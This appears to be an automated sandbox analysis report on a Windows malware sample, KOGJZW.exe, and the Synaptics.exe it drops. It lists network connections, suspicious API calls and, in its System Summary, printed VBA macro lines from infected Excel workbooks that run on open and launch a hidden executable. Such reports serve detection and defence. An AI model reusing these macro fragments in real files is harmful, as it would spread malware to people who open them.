Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866

Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49910 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:49939 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49960 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:49995 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49996 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50047 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50048 version: TLS 1.2

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_00467099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

2_2_00467099

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00467294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_00467294
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003D7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		9_2_003D7294

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

2_2_00467099

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_00454342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

2_2_00454342

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_0047F5D0
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		9_2_003EF5D0

System Summary

Document contains an embedded VBA macro with suspicious strings

Source: l8G3M3Tz.xlsm.3.dr	OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: l8G3M3Tz.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: l8G3M3Tz.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: l8G3M3Tz.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: l8G3M3Tz.xlsm.3.dr	OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: l8G3M3Tz.xlsm.3.dr	OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: l8G3M3Tz.xlsm.3.dr	OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: l8G3M3Tz.xlsm.3.dr	OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: l8G3M3Tz.xlsm.3.dr	OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: l8G3M3Tz.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: l8G3M3Tz.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
Source: BJZFPPWAPT.xlsm.3.dr	OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: BJZFPPWAPT.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: BJZFPPWAPT.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: BJZFPPWAPT.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: BJZFPPWAPT.xlsm.3.dr	OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: BJZFPPWAPT.xlsm.3.dr	OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: BJZFPPWAPT.xlsm.3.dr	OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: BJZFPPWAPT.xlsm.3.dr	OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: BJZFPPWAPT.xlsm.3.dr	OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: BJZFPPWAPT.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: BJZFPPWAPT.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: l8G3M3Tz.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
Source: BJZFPPWAPT.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: l8G3M3Tz.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: BJZFPPWAPT.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Source: l8G3M3Tz.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
Source: BJZFPPWAPT.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_004129C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	2_2_004129C2
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047F0A1 SendMessageW,NtdllDialogWndProc_W,	2_2_0047F0A1
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	2_2_0047F122
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_004802AA NtdllDialogWndProc_W,	2_2_004802AA
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047F37C NtdllDialogWndProc_W,	2_2_0047F37C
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047F3DA NtdllDialogWndProc_W,	2_2_0047F3DA
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047F3AB NtdllDialogWndProc_W,	2_2_0047F3AB
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047F45A ClientToScreen,NtdllDialogWndProc_W,	2_2_0047F45A
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047F425 NtdllDialogWndProc_W,	2_2_0047F425
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	2_2_0047F5D0
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047F594 GetWindowLongW,NtdllDialogWndProc_W,	2_2_0047F594
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047E769 NtdllDialogWndProc_W,CallWindowProcW,	2_2_0047E769
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0042B7F2 NtdllDialogWndProc_W,	2_2_0042B7F2
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0042B845 NtdllDialogWndProc_W,	2_2_0042B845
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047EA4E NtdllDialogWndProc_W,	2_2_0047EA4E
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	2_2_0047EAA6
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0042AC99 NtdllDialogWndProc_W,	2_2_0042AC99
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	2_2_0047ECBC
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0042AD5C NtdllDialogWndProc_W,74D2C8D0,NtdllDialogWndProc_W,	2_2_0042AD5C
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047FE80 NtdllDialogWndProc_W,	2_2_0047FE80
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	2_2_0047FF04
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	2_2_0047FF91
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	2_2_0047EFA8
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0042AFB4 GetParent,NtdllDialogWndProc_W,	2_2_0042AFB4
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003829C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	9_2_003829C2
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EF0A1 SendMessageW,NtdllDialogWndProc_W,	9_2_003EF0A1
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	9_2_003EF122
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003F02AA NtdllDialogWndProc_W,	9_2_003F02AA
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EF37C NtdllDialogWndProc_W,	9_2_003EF37C
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EF3AB NtdllDialogWndProc_W,	9_2_003EF3AB
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EF3DA NtdllDialogWndProc_W,	9_2_003EF3DA
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EF425 NtdllDialogWndProc_W,	9_2_003EF425
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EF45A ClientToScreen,NtdllDialogWndProc_W,	9_2_003EF45A
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EF594 GetWindowLongW,NtdllDialogWndProc_W,	9_2_003EF594
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	9_2_003EF5D0
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EE769 NtdllDialogWndProc_W,CallWindowProcW,	9_2_003EE769
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_0039B7F2 NtdllDialogWndProc_W,	9_2_0039B7F2
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_0039B845 NtdllDialogWndProc_W,	9_2_0039B845
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EEA4E NtdllDialogWndProc_W,	9_2_003EEA4E
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	9_2_003EEAA6
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	9_2_003EECBC
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_0039AC99 NtdllDialogWndProc_W,	9_2_0039AC99
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_0039AD5C NtdllDialogWndProc_W,74D2C8D0,NtdllDialogWndProc_W,	9_2_0039AD5C
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EFE80 NtdllDialogWndProc_W,	9_2_003EFE80
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	9_2_003EFF04
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_0039AFB4 GetParent,NtdllDialogWndProc_W,	9_2_0039AFB4
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	9_2_003EEFA8
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	9_2_003EFF91

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0045702F: CreateFileW,DeviceIoControl,CloseHandle,

2_2_0045702F

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0044BC8F GetCurrentProcess,OpenProcessToken,CloseHandle,CreateProcessWithLogonW,

2_2_0044BC8F

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_004582D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_004582D0
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003C82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		9_2_003C82D0

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_004730AD	2_2_004730AD
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00423680	2_2_00423680
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0041DCD0	2_2_0041DCD0
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0041A0C0	2_2_0041A0C0
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0044113E	2_2_0044113E
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00430183	2_2_00430183
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0045220C	2_2_0045220C
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_004312F9	2_2_004312F9
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0044542F	2_2_0044542F
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00418530	2_2_00418530
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047F5D0	2_2_0047F5D0
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00416670	2_2_00416670
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00430677	2_2_00430677
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0047A8DC	2_2_0047A8DC
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0044599F	2_2_0044599F
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00430A8F	2_2_00430A8F
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0043AC83	2_2_0043AC83
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0042AD5C	2_2_0042AD5C
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00415D32	2_2_00415D32
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0041BDF0	2_2_0041BDF0
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0043BDF6	2_2_0043BDF6
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00431E5A	2_2_00431E5A
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00430EC4	2_2_00430EC4
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00444EBF	2_2_00444EBF
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0043DF69	2_2_0043DF69
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00447FFD	2_2_00447FFD
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0045BFB8	2_2_0045BFB8
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_0038DCD0	9_2_0038DCD0
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003E30AD	9_2_003E30AD
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_0038A0C0	9_2_0038A0C0
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003B113E	9_2_003B113E
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003A0183	9_2_003A0183
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003C220C	9_2_003C220C
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003A12F9	9_2_003A12F9
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003B542F	9_2_003B542F
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_00388530	9_2_00388530
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EF5D0	9_2_003EF5D0
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_00386670	9_2_00386670
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003A0677	9_2_003A0677
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_00393680	9_2_00393680
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003EA8DC	9_2_003EA8DC
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003B599F	9_2_003B599F
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003A0A8F	9_2_003A0A8F
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003AAC83	9_2_003AAC83
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_00385D32	9_2_00385D32
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_0039AD5C	9_2_0039AD5C
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_0038BDF0	9_2_0038BDF0
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003ABDF6	9_2_003ABDF6
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003A1E5A	9_2_003A1E5A
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003B4EBF	9_2_003B4EBF
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003A0EC4	9_2_003A0EC4
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003ADF69	9_2_003ADF69
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003CBFB8	9_2_003CBFB8
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003B7FFD	9_2_003B7FFD

Source: l8G3M3Tz.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: l8G3M3Tz.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: BJZFPPWAPT.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: BJZFPPWAPT.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: String function: 00437750 appears 42 times
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: String function: 0042F885 appears 68 times
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: String function: 003A7750 appears 42 times
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: String function: 0039F885 appears 68 times

Source: C:\ProgramData\Synaptics\Synaptics.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7936 -s 7400

Source: KOGJZW.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Source: KOGJZW.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
